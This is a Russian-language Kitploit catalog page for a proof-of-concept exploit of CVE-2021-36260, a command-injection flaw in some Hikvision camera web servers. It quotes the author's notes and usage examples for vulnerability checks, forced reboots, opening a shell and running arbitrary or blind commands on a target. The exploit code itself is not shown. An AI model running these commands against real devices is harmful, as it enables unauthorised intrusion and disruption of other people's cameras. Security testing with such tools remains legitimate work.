Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-36260 — уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать эту уязвимость для запуска атаки внедрения команд, отправляя некоторые сообщения с вредоносными командами. | Kitploit
Инструменты/GitHubGitHub/aiminsun/cve-2021-36260
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubaiminsun/cve-2021-36260

CVE-2021-36260

уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать эту уязвимость для запуска атаки внедрения команд, отправляя некоторые сообщения с вредоносными командами.

Репозиторий
2977974 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-36260

CVE-2021-36260 POC - уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать уязвимость для проведения атаки путем внедрения команд, отправляя сообщения с вредоносными командами.

Название эксплойта: Hikvision Web Server Build 210702 - Внедрение команд

Автор эксплойта: bashis

Домашняя страница вендора: https://www.hikvision.com/

Версия: 1.0

CVE: CVE-2021-36260

Ссылка: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

Вся заслуга Watchful_IP

Примечание:

  1. Этот код не будет проверять, является ли удаленное устройство устройством Hikvision или нет.
  2. Мой основной интерес в этом коде был сосредоточен на том, как надежно обнаруживать уязвимые и/или эксплуатируемые устройства. Некоторые устройства легко обнаружить, проверить и использовать уязвимость, другие устройства могут быть уязвимы, но не так легко проверить и использовать. Я считаю, что объединенный код проверки должен иметь очень высокую точность.
  3. 'safe check' (--check) попытается записать и прочитать для проверки 'unsafe check' (--reboot) попытается перезагрузить устройство для проверки

[Примеры] Безопасная проверка уязвимости/верификация: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Безопасная и небезопасная проверка уязвимости/верификация: (будет использовать 'unsafe check' только если не пройдена проверка с помощью 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Небезопасная проверка уязвимости/верификация: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Запуск и подключение к SSH-оболочке: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Выполнить команду: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Выполнить слепую команду: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

Скачать инструмент